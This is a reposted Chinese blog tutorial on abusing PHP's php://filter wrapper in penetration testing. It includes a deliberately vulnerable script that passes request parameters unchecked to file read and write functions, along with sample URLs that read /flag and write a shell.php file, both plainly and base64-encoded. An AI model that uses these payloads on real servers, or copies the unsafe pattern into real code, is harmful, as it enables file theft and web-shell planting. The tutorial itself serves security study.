-------已搬运------探索php://filter在实战当中的奇技淫巧

最新推荐文章于 2024-07-27 22:51:17 发布
最新推荐文章于 2024-07-27 22:51:17 发布
阅读量209 收藏
点赞数
文章标签: 过滤器 php
原文链接:https://www.anquanke.com/post/id/202510#h2-8
版权

目录:

参考自:探索php://filter在实战当中的奇技淫巧

在渗透测试或漏洞挖掘的过程中,我们经常会遇到php://filter结合其他漏洞,比如 文件包含,文件读取,反序列化,XXE等等 进行组合利用,以达到一定的攻击效果,拿到相应的服务器的权限。

php://filter

来了解原理:

php://filter 是一种元封装器,设计用于数据流打开时的筛选过滤应用。这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(),在数据流内容读取之前没有机会应用其他过滤器。
.

php://filter 目标使用以下的参数作为它路径的一部分。复合过滤链能够在一个路径上指定。详细使用这些参数可以参考具体范例。

在这里插入图片描述

1. 自己的尝试:

1. 当前面有路径限制的时候,

上面说了是在文件流的时候进行过滤的。但是如果题目在前面有前缀的 话,就不行了。直接?file1=php://filter/resource=flag,没有办法。不能够读取任意文件。同样,写文件也是不行 的。

在这里插入图片描述没有前缀限制的话,写入文件:
也只能够写入本目录下,不能够想读取文件一样,在任意目录进行写入文件,也是只能够在本目录下进行写入。

在这里插入图片描述

1.使用

0. 测试代码:
<?php
    $file1 = $_GET['file1'];
    $file2 = $_GET['file2'];
    $txt = $_GET['txt'];
    echo file_get_contents($file1);
    file_put_contents($file2,$txt);
?>
1.读取文件:
# 明文读取
test.php?file1=php://filter/resource=/flag

# 编码读取
test.php?file1=php://filter/read=convert.base64-decode/resource=/flag

在这里插入图片描述

2. 写入文件:
# 明文写入:
test.php?file2=php://filter/resource=shell.php&txt=<?php phpinfo();?>

#编码写入:
test.php?file2=php://filter/write=convert.base64-encode/resource=shell.php&txt=<?php phpinfo();?>

在这里插入图片描述

Zero_Adam
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【go实战系列八】golang中json tag的5个奇技淫巧 与 go-zero rpc中慎用 omitempty 禁用omitempty的好处
CTRA®王大大技术中心
02-28 735
golang中json tag的5个奇技淫巧 与慎用 omitempty 生产中restful服务禁用omitempty
docker-compose部署项目
一叶知秋
09-21 3242
前言: 参考几篇非常优秀的文章: 不要轻易使用 Alpine 镜像来构建 Docker 镜像,有坑! 两个奇技淫巧,将 Docker 镜像体积减小 99% 听说你的 Docker 镜像比较胖? Docker Compose 配置文件详解 以及非常优秀的开源项目: Gin-Vue-Admin Docker Compose 概述 Compose 是一个用于定义和运行多容器 Docker 应用程序的工具。借助 Compose,可以使用 YAML 文件来配置应用程序的服务。然后,使用单个命令,从配置中创建并启动所有
Github-Pages-Markdown用法之-奇技淫巧
阿拉灯神丁Vicky
03-31 1419
个人博客: https://www.bobinsun.cn 本篇文章不涉及Markdown的基本用法,主要总结本人在使用Markdown写博客时所用到的奇技淫巧,如有需要,拿走不谢。 Markdown图片用法 图片居中 <div align="center"><img src="https://www.bobinsun.cn/assets/images/logo-top.jpg...
CSP-J2019游记——退役宣言
qq_45529607的博客
11-16 801
今天,参加了CSP,发现4道题好简单困难,我绝对要凉了。 为了给以后的队员留下一点财富(摘自全国著名信竞教练周垂原言),总结一下参赛和训练的感受。 一、CSP初赛很重要 如果初赛不准备充足,很有可能退役,所以准备好初赛成为了每届Oier的首要任务,无论是j还是s都要过初赛,才能参加复赛,才有希望(受打击)。 二、复赛要奇技淫巧 CSP2019-J组的题目难易结合,有一定的挑战性。但其中有一定的(...
探索php://filter实战当中奇技淫巧
qq_45521281的博客
05-30 1716
前言 在渗透测试或漏洞挖掘的过程中,我们经常会遇到php://filter结合其它漏洞比如文件包含、文件读取、反序列化、XXE等进行组合利用,以达到一定的攻击效果,拿到相应的服务器权限。 最近看到php://filter在ThinkPHP反序列化中频繁出现利用其相应构造可以RCE,那么下面就来探索一下关于php://filter在漏洞挖掘中的一些奇技淫巧php://filter探索php://filter实战当中奇技淫巧时,一定要先了解关于php://filter的原理和利用。 php://fi
Keras-5 基于 ImageDataGenerator 的 Data Augmentation实现
热门推荐
记录学习的过程
11-26 1万+
Image Data Augmentation In Keras讨论的内容包括 Data Augmentation ImageDataGenerator 的使用方法 在cifar-10数据集上使用Data Augmentation 完整代码在 这里 下载Data AugmentationData Aumentation(数据扩充)指的是在使用以下或者其他方法增加数据输入量。这里,我们特指图像数据。
【U-Net】《U-Net:Convolutional Networks for Biomedical Image Segmentation》
bryant_meng
04-25 780
MICCAI-2015 文章目录1 Background and Motivation2 Advantages / Contributions3 Method3.1 Network Architecture3.2 Loss Function3.3 Data Augmentation4 Experiments4.1 Datasets4.2 EM segmentation challenge4....
wxPython+Vuejs+Element-UI实现记事本的思路及解决方案
每天进步一点点
12-29 1755
首先,这个思路有点偏,大概有点奇技淫巧的嫌疑。由于行文混乱,大家可以根据加粗字体的字体定位到需要具体了解的内容。 容我先吐槽一下Electron 我们知道用html写桌面端程序好说啊,拿Electron或者NW任何一个都可以,也可以单纯用NodeJS或Vue,都没什么问题,码起来速度快不说,界面也漂亮,遇到问题网上也有一大堆解决方法(一大堆重复的解决方法,天朝网友威武)。我用了一段时间Electr...
springsource-tool-suite,在spring官网上下载历史版本的spring插件
P01214100的博客
09-10 1296
奇技淫巧:在spring官网上下载历史版本的spring插件,springsource-tool-suite   sts-3.7.2历史版本信息下载地址:http://download.springsource.com/release/STS/3.7.2.RELEASE/dist/e4.5/spring-tool-suite-3.7.2.RELEASE-e4.5.1-win32-x86_64....
git-tips:Git的奇技淫巧
02-04
在实际工作中,不断探索和学习新的Git用法,会让你成为Git的真正高手。记得实践是检验真理的唯一标准,多用多练,自然熟能生巧。在项目协作中,掌握这些Git奇技淫巧,不仅能让你的代码管理更加得心应手,还能提升...
Go-Git的奇技淫巧
08-14
在这个“Go-Git的奇技淫巧”中,我们将探讨一些高级和实用的Git技巧,以及如何使用Go来进一步操作Git。 1. **分支管理**:Git的分支机制允许开发者在同一项目上并行工作。`git branch`命令用于创建、查看和切换分支...
Python-收集到的一些src挖掘奇技淫巧
08-10
这个压缩包文件"Python-收集到的一些src挖掘奇技淫巧"可能是包含了一系列用于Python源代码安全检查和分析的技巧和工具。下面我们将深入探讨一些相关的知识点。 1. **源代码分析**:这是对软件项目源代码进行的详细...
CSS-Notes:CSS相关综合专栏。 计划包含四个方面: ①CSS基础②进阶专题③面试题汇总④一些有意思的奇技淫巧
05-09
CSS-Notes 目录 CSS基础 09-Flex弹性布局 10-Grid网格布局 11-媒体查询 CSS进阶 专题总结-兼容性问题 专题总结-居中问题 专题总结-常用布局 专题总结-回流重绘 技巧总结-幽灵空白节点 ...技巧总结-检测浏览器对CSS属性...
vim user manual ---vim用户手册
12-22
jusr 12.txtj 奇技淫巧 高效编辑 jusr 20.txtj 加速冒号命令 jusr 21.txtj 进退之间 jusr 22.txtj 查找要编辑的文件 jusr 23.txtj 非文本文件 jusr 24.txtj 快速键入 jusr 25.txtj 编辑格式化文本 jusr 26.txtj 重复...
[Meachines] [Easy] Beep Elastix-CMS-LFI
最新发布
07-27 282
#Elastix-CMS-LFI
PHP商城案例
王世凡的技术博客
07-26 344
http://www.e9933.com/
MICA:面向复杂嵌入式系统的混合关键性部署框架
openEuler_的博客
07-23 1089
这种方式存在的问题是:硬件上需要两套系统、集成度不高,通信受限于片外物理机制的限制(如速度、时延等),软件上 Linux 和实时操作系统两者之间是割裂的,在灵活性上、可维护性上存在改进空间。在上述架构中,virtio-rpmsg 相当于网络协议中的 MAC 层,提供高效的底层通信机制,rpmsg 相当于网络协议中的传输层,提供了基于端点(endpoint)与通道(channel)抽象的通信机制,remoteproc 提供不同南向底座的生命周期管理功能,包括初始化、启动、暂停、结束等。MICA 的守护进程。
PHP基础语法-Part2
weixin_51591328的博客
07-25 371
与其他语言相同。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值